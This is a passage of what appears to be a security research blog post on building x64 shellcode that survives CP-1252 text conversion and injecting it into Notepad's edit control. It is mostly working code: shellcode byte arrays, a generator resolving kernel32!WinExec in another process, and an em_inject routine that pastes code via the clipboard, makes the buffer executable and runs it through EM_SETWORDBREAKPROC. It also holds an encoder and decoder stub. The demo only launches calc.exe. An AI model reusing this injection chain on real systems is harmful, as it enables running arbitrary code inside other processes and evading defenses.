"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc1\x00\x18"         /* rol   dword [rax], 0x18 */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x35\x00\x56\x00\x12" /* xor   eax, 0x12005600   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */

Another example using MOV and ROL.

"\x68\x00\x56\x00\x12" /* push  0x12005600        */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x54"                 /* push  rsp               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc6\x00\x78"         /* mov   byte [rax], 0x78  */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc1\x00\x10"         /* rol   dword [rax], 0x10 */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc6\x00\x34"         /* mov   byte [rax], 0x34  */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc1\x00\x10"         /* rol   dword [rax], 0x10 */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */

Final example uses MOV, ADD, SCASB with the address of buffer stored in RDI.

"\x6a\x00"             /* push  0                 */
"\x54"                 /* push  rsp               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x5f"                 /* pop   rdi               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xb8\x00\x12\x00\xff" /* mov   eax, 0xff001200   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xbb\x00\x34\x00\xff" /* mov   ebx, 0xff003400   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xb9\x00\x56\x00\xff" /* mov   ecx, 0xff005600   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xba\x00\x78\x00\xff" /* mov   edx, 0xff007800   */
"\x00\x27"             /* add   byte [rdi], ah    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xae"                 /* scasb                   */
"\x00\x3f"             /* add   byte [rdi], bh    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xae"                 /* scasb                   */
"\x00\x2f"             /* add   byte [rdi], ch    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xae"                 /* scasb                   */
"\x00\x37"             /* add   byte [rdi], dh    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */

3.6 Two Byte Instructions

If all you need are two byte instructions that contain one null byte, the following may be considered. For the branch instructions, regardless of whether a condition is true or false, the instruction is always branching to the next address. The loop instructions might be useful if you want to subtract 1 from an address. To add 1 or 4 to an address, copy it to RDI and use SCASB or SCASD. LODSB or LODSD can be used too if the address is in RSI, but just remember they overwrite AL and EAX respectively.

    ; logic
    or al, 0
    
    xor al, 0
    
    and al, 0
    
    ; arithmetic
    add al, 0
    
    adc al, 0
    
    sbb al, 0
    
    sub al, 0
    
    ; comparison predicates
    cmp al, 0
    
    test al, 0
    
    ; data transfer
    mov al, 0
    mov ah, 0
    
    mov bl, 0
    mov bh, 0
    
    mov cl, 0
    mov ch, 0
    
    mov dl, 0
    mov dh, 0
    
    ; branches
    jmp $+2
    
    jo $+2
    jno $+2
  
    jb $+2
    jae $+2
    
    je $+2
    jne $+2
    
    jbe $+2
    ja $+2
    
    js $+2
    jns $+2
    
    jp $+2
    jnp $+2
    
    jl $+2
    jge $+2
    
    jle $+2
    jg $+2

    jrcxz $+2
    
    loop $+2
    
    loope $+2
    
    loopne $+2

3.7 Prefix Codes

Some of these prefixes can be used to pad an instruction. The only instructions I tested were 8-Bit operations.

Prefix Description
0x2E, 0x3E Branch hints have no effect on anything newer than a Pentium 4. Harmless to use up a byte of space between instructions.
0xF0 The LOCK prefix guarantees the instruction has exclusive use of all shared memory, until the instruction completes execution.
0xF2, 0xF3 REP(0xF2) tells the CPU to repeat execution of a string manipulation instruction like MOVS, STOS, CMPS or SCAS until RCX is zero. REPNE (0xF3) repeats execution until RCX is zero or the Zero Flag (ZF) is cleared.
0x26, 0x2E, 0x36, 0x3E, 0x64, 0x65 The Extra Segment (ES) (0x26) prefix is used for the destination of string operations. The Code Segment (CS) (0x2E) for all instructions is the same as a branch hint and has no effect. The Stack Segment (0x36) is used for storing and loading local variables with instructions like PUSH/POP. The Data Segment (DS) (0x3E) for all data references, except stack and is also the same as a branch hint, which has no effect. FS(0x64) and GS(0x65) are not designated, but you’ll see them used to access the Thread Environment Block (TEB) on Windows or the Thread Local Storage (TLS) on Linux.
0x66, 0x67 Used to override the default size of a data type in 32-bit mode for a PUSH/POP or MOV. NASM/YASM support operand-size (0x66) and operand-address (0x67) prefixes using a16, a32, o16 and o32.
0x40 – 0x4F REX prefixes for 64-Bit mode.

4. Generating Shellcode

Some things to consider when writing your own.

  • Preserve all non-volatile registers used. RSI, RDI, RBP, RBX
  • Allocate 32 bytes for homespace. This will be used by any API you invoke.
  • Before invoking API, ensure the value of SP is aligned by 16 bytes minus 8.

Some API will use SIMD instructions, usually for memcpy() or memset() of small blocks of data. To achieve optimal performance, the data accessed must be aligned by 16 bytes. If the stack pointer is misaligned and SIMD instructions are used to read or write to SP, this will result in an unhandled exception. Since we can’t use a CALL instruction, RET is used instead and once executed removes an API address from the stack. If it’s not aligned by 16 bytes at that point, expect trouble! 🙂

Using previous examples, the following code will construct a CP-1252 compatible shellcode to execute calc.exe using kernel32!WinExec(). This is simply to demonstrate the injection via notepads edit control works.

// the max address for virtual memory on 
// windows is (2 ^ 47) - 1 or 0x7FFFFFFFFFFF
#define MAX_ADDR 6

// only useful for CP_ACP codepage
static
int is_cp1252_allowed(int ch) {
  
    // zero is allowed, but we can't use it for the clipboard
    if(ch == 0) return 0;
    
    // bytes converted to double byte characters
    if(ch >= 0x80 && ch <= 0x8C) return 0;
    if(ch >= 0x91 && ch <= 0x9C) return 0;
    
    return (ch != 0x8E && ch != 0x9E && ch != 0x9F);
}

// Allocate 64-bit buffer on the stack.
// Then place the address in RDI for writing.
#define STORE_ADDR_SIZE 10

char STORE_ADDR[] = {
  /* 0000 */ "\x6a\x00"             /* push 0                */
  /* 0002 */ "\x54"                 /* push rsp              */
  /* 0003 */ "\x00\x5d\x00"         /* add  byte [rbp], cl   */
  /* 0006 */ "\x5f"                 /* pop  rdi              */
  /* 0007 */ "\x00\x5d\x00"         /* add  byte [rbp], cl   */
};

// Load an 8-Bit immediate value into AH
#define LOAD_BYTE_SIZE 5

char LOAD_BYTE[] = {
  /* 0000 */ "\xb8\x00\xff\x00\x4d" /* mov   eax, 0x4d00ff00 */
};

// Subtract 32 from AH
#define SUB_BYTE_SIZE 8

char SUB_BYTE[] = {
  /* 0000 */ "\x00\x5d\x00"         /* add   byte [rbp], cl  */
  /* 0003 */ "\x2d\x00\x20\x00\x5d" /* sub   eax, 0x4d002000 */
};

// Store AH in buffer and advance RDI by 1
#define STORE_BYTE_SIZE 9

char STORE_BYTE[] = {
  /* 0000 */ "\x00\x27"             /* add   byte [rdi], ah  */
  /* 0002 */ "\x00\x5d\x00"         /* add   byte [rbp], cl  */
  /* 0005 */ "\xae"                 /* scasb                 */
  /* 0006 */ "\x00\x5d\x00"         /* add   byte [rbp], cl  */
};

// Transfers control of execution to kernel32!WinExec
#define RET_SIZE 2

char RET[] = {
  /* 0000 */ "\xc3" /* ret  */
  /* 0002 */ "\x00"
};

#define CALC3_SIZE 164
#define RET_OFS 0x20 + 2

char CALC3[] = {
  /* 0000 */ "\xb0\x00"                 /* mov   al, 0                 */
  /* 0002 */ "\xc8\x00\x01\x00"         /* enter 0x100, 0              */
  /* 0006 */ "\x55"                     /* push  rbp                   */
  /* 0007 */ "\x00\x45\x00"             /* add   byte [rbp], al        */
  /* 000A */ "\x6a\x00"                 /* push  0                     */
  /* 000C */ "\x54"                     /* push  rsp                   */
  /* 000D */ "\x00\x45\x00"             /* add   byte [rbp], al        */
  /* 0010 */ "\x5d"                     /* pop   rbp                   */
  /* 0011 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0014 */ "\x57"                     /* push  rdi                   */
  /* 0015 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0018 */ "\x56"                     /* push  rsi                   */
  /* 0019 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 001C */ "\x53"                     /* push  rbx                   */
  /* 001D */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0020 */ "\xb8\x00\x4d\x00\xff"     /* mov   eax, 0xff004d00       */
  /* 0025 */ "\x00\xe1"                 /* add   cl, ah                */
  /* 0027 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 002A */ "\xb8\x00\x01\x00\xff"     /* mov   eax, 0xff000100       */
  /* 002F */ "\x00\xe5"                 /* add   ch, ah                */
  /* 0031 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0034 */ "\x51"                     /* push  rcx                   */
  /* 0035 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0038 */ "\x5b"                     /* pop   rbx                   */
  /* 0039 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 003C */ "\x6a\x00"                 /* push  0                     */
  /* 003E */ "\x54"                     /* push  rsp                   */
  /* 003F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0042 */ "\x5f"                     /* pop   rdi                   */
  /* 0043 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0046 */ "\x57"                     /* push  rdi                   */
  /* 0047 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 004A */ "\x59"                     /* pop   rcx                   */
  /* 004B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 004E */ "\x6a\x00"                 /* push  0                     */
  /* 0050 */ "\x54"                     /* push  rsp                   */
  /* 0051 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0054 */ "\x58"                     /* pop   rax                   */
  /* 0055 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0058 */ "\xc7\x00\x63\x00\x6c\x00" /* mov   dword [rax], 0x6c0063 */
  /* 005E */ "\x58"                     /* pop   rax                   */
  /* 005F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0062 */ "\x35\x00\x61\x00\x63"     /* xor   eax, 0x63006100       */
  /* 0067 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 006A */ "\xab"                     /* stosd                       */
  /* 006B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 006E */ "\x6a\x00"                 /* push  0                     */
  /* 0070 */ "\x54"                     /* push  rsp                   */
  /* 0071 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0074 */ "\x58"                     /* pop   rax                   */
  /* 0075 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0078 */ "\xc6\x00\x05"             /* mov   byte [rax], 5         */
  /* 007B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 007E */ "\x5a"                     /* pop   rdx                   */
  /* 007F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0082 */ "\x53"                     /* push  rbx                   */
  /* 0083 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0086 */ "\x6a\x00"                 /* push  0                     */
  /* 0088 */ "\x6a\x00"                 /* push  0                     */
  /* 008A */ "\x6a\x00"                 /* push  0                     */
  /* 008C */ "\x6a\x00"                 /* push  0                     */
  /* 008E */ "\x6a\x00"                 /* push  0                     */
  /* 0090 */ "\x53"                     /* push  rbx                   */
  /* 0091 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0094 */ "\x90"                     /* nop                         */
  /* 0095 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0098 */ "\x90"                     /* nop                         */
  /* 0099 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 009C */ "\x90"                     /* nop                         */
  /* 009D */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 00A0 */ "\x90"                     /* nop                         */
  /* 00A1 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
};

#define CALC4_SIZE 79
#define RET_OFS2 0x18 + 2

char CALC4[] = {
  /* 0000 */ "\x59"                 /* pop  rcx              */
  /* 0001 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0004 */ "\x59"                 /* pop  rcx              */
  /* 0005 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0008 */ "\x59"                 /* pop  rcx              */
  /* 0009 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 000C */ "\x59"                 /* pop  rcx              */
  /* 000D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0010 */ "\x59"                 /* pop  rcx              */
  /* 0011 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0014 */ "\x59"                 /* pop  rcx              */
  /* 0015 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0018 */ "\xb8\x00\x4d\x00\xff" /* mov  eax, 0xff004d00  */
  /* 001D */ "\x00\xe1"             /* add  cl, ah           */
  /* 001F */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0022 */ "\x51"                 /* push rcx              */
  /* 0023 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0026 */ "\x58"                 /* pop  rax              */
  /* 0027 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 002A */ "\xc6\x00\xc3"         /* mov  byte [rax], 0xc3 */
  /* 002D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0030 */ "\x59"                 /* pop  rcx              */
  /* 0031 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0034 */ "\x5b"                 /* pop  rbx              */
  /* 0035 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0038 */ "\x5e"                 /* pop  rsi              */
  /* 0039 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 003C */ "\x5f"                 /* pop  rdi              */
  /* 003D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0040 */ "\x59"                 /* pop  rcx              */
  /* 0041 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0044 */ "\x6a\x00"             /* push 0                */
  /* 0046 */ "\x58"                 /* pop  rax              */
  /* 0047 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 004A */ "\x5c"                 /* pop  rsp              */
  /* 004B */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 004E */ "\x5d"                 /* pop  rbp              */
};


static
u8* cp1252_generate_winexec(int pid, int *cslen) {
    int     i, ofs, outlen;
    u8      *cs, *out;
    HMODULE m;
    w64_t   addr;
    
    // it won't exceed 512 bytes
    out = (u8*)cs = VirtualAlloc(
      NULL, 4096, 
      MEM_COMMIT | MEM_RESERVE, 
      PAGE_EXECUTE_READWRITE);
    
    // initialize parameters for WinExec()
    memcpy(out, CALC3, CALC3_SIZE);
    out += CALC3_SIZE;

    // initialize RDI for writing
    memcpy(out, STORE_ADDR, STORE_ADDR_SIZE);
    out += STORE_ADDR_SIZE;

    // ***********************************
    // store kernel32!WinExec on stack
    m = GetModuleHandle("kernel32");
    addr.q = ((PBYTE)GetProcAddress(m, "WinExec") - (PBYTE)m);
    m = GetProcessModuleHandle(pid, "kernel32.dll");
    addr.q += (ULONG_PTR)m;
    
    for(i=0; i<MAX_ADDR; i++) {      
      // load a byte into AH
      memcpy(out, LOAD_BYTE, LOAD_BYTE_SIZE);
      out[2] = addr.b[i];
    
      // if byte not allowed for CP1252, add 32
      if(!is_cp1252_allowed(out[2])) {
        out[2] += 32;
        // subtract 32 from byte at runtime
        memcpy(&out[LOAD_BYTE_SIZE], SUB_BYTE, SUB_BYTE_SIZE);
        out += SUB_BYTE_SIZE;
      }
      out += LOAD_BYTE_SIZE;
      // store AH in [RDI], increment RDI
      memcpy(out, STORE_BYTE, STORE_BYTE_SIZE);
      out += STORE_BYTE_SIZE;
    }
    
    // calculate length of constructed code
    ofs = (int)(out - (u8*)cs) + 2;
    
    // first offset
    cs[RET_OFS] = (uint8_t)ofs;
    
    memcpy(out, RET, RET_SIZE);
    out += RET_SIZE;
    
    memcpy(out, CALC4, CALC4_SIZE);
    
    // second offset
    ofs = CALC4_SIZE;
    ((u8*)out)[RET_OFS2] = (uint8_t)ofs;
    out += CALC4_SIZE;
    
    outlen = ((int)(out - (u8*)cs) + 1) & -2;

    // convert to ascii
    for(i=0; i<=outlen; i+=2) {
      cs[i/2] = cs[i];
    }

    *cslen = outlen / 2;
    // return pointer to code
    return cs;
}

5. Injecting and Executing Shellcode

The following steps are used.

  1. Execute notepad.exe and obtain a window handle for the edit control.
  2. Get the edit control handle using the EM_GETHANDLE message.
  3. Generate text equivalent to, or greater than the size of the shellcode and copy it to the clipboard.
  4. Assign a NULL pointer to lastbuf
  5. Read the address of input buffer from the EM handle and assign to embuf.
  6. If lastbuf and embuf are equal. Goto step 9.
  7. Clear the memory buffer using WM_SETSEL and WM_CLEAR.
  8. Send the WM_PASTE message to the edit control window handle. Wait 1 second, then goto step 5.
  9. Set embuf to PAGE_EXECUTE_READWRITE.
  10. Generate CP-1252 compatible shellcode and copy to the clipboard.
  11. Set the edit control word break function to embuf using EM_SETWORDBREAKPROC
  12. Trigger execution of shellcode using WM_LBUTTONDBLCLK
BOOL em_inject(void) {
    HWND   npw, ecw;
    w64_t  emh, lastbuf, embuf;
    SIZE_T rd;
    HANDLE hp;
    DWORD  cslen, pid, old;
    BOOL   r;
    PBYTE  cs;
    
    char   buf[1024];
    
    // get window handle for notepad class
    npw = FindWindow("Notepad", NULL);
    
    // get window handle for edit control
    ecw = FindWindowEx(npw, NULL, "Edit", NULL);
    
    // get the EM handle for the edit control
    emh.p = (PVOID)SendMessage(ecw, EM_GETHANDLE, 0, 0);
    
    // get the process id for the window
    GetWindowThreadProcessId(ecw, &pid);
    
    // open the process for reading and changing memory permissions
    hp = OpenProcess(PROCESS_VM_READ | PROCESS_VM_OPERATION, FALSE, pid);

    // copy some test data to the clipboard
    memset(buf, 0x4d, sizeof(buf));
    CopyToClipboard(CF_TEXT, buf, sizeof(buf));    
    
    // loop until target buffer address is stable
    lastbuf.p = NULL;
    r = FALSE;

    for(;;) {
      // read the address of input buffer     
      ReadProcessMemory(hp, emh.p, 
        &embuf.p, sizeof(ULONG_PTR), &rd);

      // Address hasn't changed? exit loop
      if(embuf.p == lastbuf.p) {
        r = TRUE;
        break;
      }
      // save this address
      lastbuf.p = embuf.p;
    
      // clear the contents of edit control
      SendMessage(ecw, EM_SETSEL, 0, -1);
      SendMessage(ecw, WM_CLEAR, 0, 0);
      
      // send the WM_PASTE message to the edit control
      // allow notepad some time to read the data from clipboard
      SendMessage(ecw, WM_PASTE, 0, 0);
      Sleep(WAIT_TIME);
    }
    
    if(r) {
      // set buffer to RWX
      VirtualProtectEx(hp, embuf.p, 4096, PAGE_EXECUTE_READWRITE, &old);
        
      // generate shellcode and copy to clipboard
      cs = cp1252_generate_winexec(pid, &cslen);
      CopyToClipboard(CF_TEXT, cs, cslen);
        
      // clear buffer and inject shellcode
      SendMessage(ecw, EM_SETSEL, 0, -1);
      SendMessage(ecw, WM_CLEAR, 0, 0);
      SendMessage(ecw, WM_PASTE, 0, 0);
      Sleep(WAIT_TIME);
      
      // set the word break procedure to address of shellcode and execute
      SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)embuf.p);
      SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
      SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
      
      // set buffer to RW
      VirtualProtectEx(hp, embuf.p, 4096, PAGE_READWRITE, &old);
    }
    CloseHandle(hp);
    return r;
}

6. Demonstration

Notepad doesn’t crash as a result of the shellcode running. The demo terminates it once the thread ends.

7. Encoding Arbitrary Data

Encoding data and code require different solutions. Raw data that doesn’t execute requires “bad characters” removed from it, while code must execute successfully after the conversion, which is not easy to accomplish in practice. The following encoding and decoding algorithms are based on a previous post about removing null characters in shellcode.

7.1 Encoding

  1. Read a byte from the input file or stream and assign to X.
  2. If X plus 1 is allowed, goto step 6.
  3. Save escape code (0x01) to the output file or stream.
  4. XOR X with 8-Bit key.
  5. Save X to the output file or stream, goto step 7.
  6. Save X plus 1 to the output file or stream.
  7. Repeat steps 1-6 until EOF.
// encode raw data to CP-1252 compatible data
static
void cp1252_encode(FILE *in, FILE *out) {
    uint8_t c, t;
    
    for(;;) {
      // read byte
      c = getc(in);
      // end of file? exit
      if(feof(in)) break;
      // if the result of c + 1 is disallowed
      if(!is_decoder_allowed(c + 1)) {
        // write escape code
        putc(0x01, out);
        // save byte XOR'd with the 8-Bit key
        putc(c ^ CP1252_KEY, out);
      } else {
        // save byte plus 1
        putc(c + 1, out);
      }
    }
}

7.2 Decoding

  1. Read a byte from the input file or stream and assign to X.
  2. If X is not an escape code, goto step 6.
  3. Read a byte from the input file or stream and assign to X.
  4. XOR X with 8-Bit key.
  5. Save X to the output file or stream, goto step 7.
  6. Save X – 1 to the output file or stream.
  7. Repeat steps 1-6 until EOF.
// decode data processed with cp1252_encode to their original values
static
void cp1252_decode(FILE *in, FILE *out) {
    uint8_t c, t;
    
    for(;;) {
      // read byte
      c = getc(in);
      // end of file? exit
      if(feof(in)) break;
      // if this is an escape code
      if(c == 0x01) {
        // read next byte
        c = getc(in);
        // XOR the 8-Bit key
        putc(c ^ CP1252_KEY, out);
      } else {
        // save byte minus one
        putc(c - 1, out);
      }
    }
}

The assembly is compatible with both 32 and 64-bit mode of the x86 architecture.

; cp1252 decoder in 40 bytes of x86/amd64 assembly
; presumes to be executing in RWX memory
; needs stack allocation if executing from RX memory
;
; odzhan

    bits 32
    
    %define CP1252_KEY 0x4D
    
    jmp    init_decode       ; read the program counter
    
    ; esi = source
    ; edi = destination 
    ; ecx = length
decode_bytes:
    lodsb                    ; read a byte
    dec    al                ; c - 1
    jnz    save_byte
    lodsb                    ; skip null byte
    lodsb                    ; read next byte
    xor    al, CP1252_KEY    ; c ^= CP1252_KEY
save_byte:
    stosb                    ; save in buffer
    lodsb                    ; skip null byte
    loop   decode_bytes
    ret
load_data:
    pop    esi               ; esi = start of data
    ; ********************** ; decode the 32-bit length
read_len:
    push   0                 ; len = 0
    push   esp               ; 
    pop    edi               ; edi = &len
    push   4                 ; 32-bits
    pop    ecx
    call   decode_bytes
    pop    ecx               ; ecx = len
    
    ; ********************** ; decode remainder of data
    push   esi               ; 
    pop    edi               ; edi = encoded data
    push   esi               ; save address for RET
    jmp    decode_bytes
init_decode:
    call   load_data
    ; CP1252 encoded data goes here..
    

The decoder could be stored at the beginning of the buffer and the callback could be stored higher up in memory.

8. Acknowledgements

I’d like to thank Adam for feedback and advice on this post. Specifically about CF_UNICODETEXT.

9. Further Research

List of papers and presentations relevant to this post. If you know of any good papers on writing Unicode shellcodes that aren’t listed here, feel free to email me with the details.

10. Code Scrapheap

What follows are just some bits of code that were considered, but not used in the end. Explanations are provided for why they were discarded.

The first one tries to set EAX to 0. Set AL and AH to 0. Then extend AX to EAX using CWDE. Unfortunately 0x98 can’t be used.

"\xb0\x00"     /* mov  al, 0             */
"\x00\x4d\x00" /* add  byte [ebp], cl    */
"\xb4\x00"     /* mov  ah, 0             */
"\x00\x4d\x00" /* add  byte [ebp], cl    */
"\x98"         /* cwde                   */

Another idea for seting EAX to 0. Clear the Carry Flag using CLC, set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX which sets EAX to 0. Can you spot the problem? 🙂 Well, the ADD affects the Carry Flag, so that’s why it doesn’t work as intended. Of course, it might work, depending on what RBP points to and the value of CL.

"\xf8"                 /* clc                       */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x1d\x00\xff\x00\xff" /* sbb   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

An idea to set EAX to -1. First, set the Carry Flag using STC, set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX which sets EAX to 0xFFFFFFFF. Same problem as before.

"\xf9"                 /* stc                       */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x1d\x00\xff\x00\xff" /* sbb   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

This was an idea for setting EAX to 1. First, set EAX to zero. Set the Carry Flag (CF), then add CF to AL using Add with Carry (ADC). Same problem as before.

"\x6a\x00"             /* push  0                     */
"\x58"                 /* pop   rax                   */
"\x00\x4d\x00"         /* add   byte [rbp], cl        */
"\xf9"                 /* stc                         */
"\x00\x4d\x00"         /* add   byte [rbp], cl        */
"\x14\x00"             /* adc   al, 0                 */

Another version to set EAX to -1. Store zero on the stack, load address into RAX and add 1. Rotate left by 31-bits to get 0x80000000. Load into EAX and use CDQ to set EDX to -1, then swap EAX and EDX. The problem is 0x99 converts to a double byte encoding.

"\x6a\x00"     /* push 0                 */
"\x54"         /* push rsp               */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x58"         /* pop  rax               */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\xff\x00"     /* inc  dword [rax]       */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\xc1\x00\x1f" /* rol  dword [rax], 0x1f */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x58"         /* pop  rax               */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x99"         /* cdq                    */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x92"         /* xchg eax, edx          */

I examined various ways to simulate instructions and conceded it could only work using self-modifying code. Using boolean logic with bitwise instructions (AND/XOR/OR/NOT) and some arithmetic (NEG/ADD/SUB) to select the address of where code execution should continue. The RET instruction is the only opcode that can be used to transfer execution. There’s no JMP, Jcc or CALL instructions that can be used directly.

If we have to modify code to simulate boolean logic, it makes more sense to just write instructions into memory and execute it there.

"\x39\xd8"             /* cmp   eax, ebx           */

There’s no simple combination of registers used with CMP or SUB that’s compatible with CP-1252. You can compare EAX with immediate values but nothing else. The following code using CMPSD attempts to demonstrate evaluating if EAX < EBX, generating a result of 0 (FALSE) or -1 (TRUE). It would have worked, except the ADD instructions before SBB generates the wrong result.

"\x50"                 /* push  rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x5e"                 /* pop   rsi                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x53"                 /* push  rbx                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x5f"                 /* pop   rdi                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xa7"                 /* cmpsd                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x6a\x00"             /* push  0                      */
"\x58"                 /* pop   rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x1c\x00"             /* sbb   al, 0                  */
"\x50"                 /* push  rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x58"                 /* pop   rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xc1\x00\x18"         /* rol   dword ptr [rax], 0x18  */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x58"                 /* pop   rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x6a\x00"             /* push  0                      */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x5f"                 /* pop   rdi                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */

Load 0xFF000700 into EAX. The Carry Flag (CF) is set using SAHF. Then subtract 0xFF000700 + CF using SBB, which sets EAX to -1 or 0xFFFFFFFF.

"\xb8\x00\x07\x00\xff" /* mov   eax, 0xff000700    */
"\x00\x4d\x00"         /* add   byte [rbp], cl     */
"\x9e"                 /* sahf                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl     */
"\x1d\x00\x07\x00\xff" /* sbb   eax, 0xff000700    */
"\x00\x4d\x00"         /* add   byte [rbp], cl     */

Two problems: SAHF is a byte we can’t use (0x9E) and even if we could, the ADD after the SAHF instruction modifies the flags register, resulting in EAX being set to 0 or -1. The result depends on the byte stored in address rbp contains and the value of CL.

Adding -1 will subtract 1 from the variable EAX contains the address of.

"\x6a\x00"             /* push  0                    */
"\x54"                 /* push  rsp                  */
"\x00\x4d\x00"         /* add   byte [rbp], cl       */
"\x58"                 /* pop   rax                  */
"\x00\x4d\x00"         /* add   byte [rbp], cl       */
"\x83\x00\xff"         /* add   dword  [eax], -1  */
"\x58"                 /* pop   rax                  */
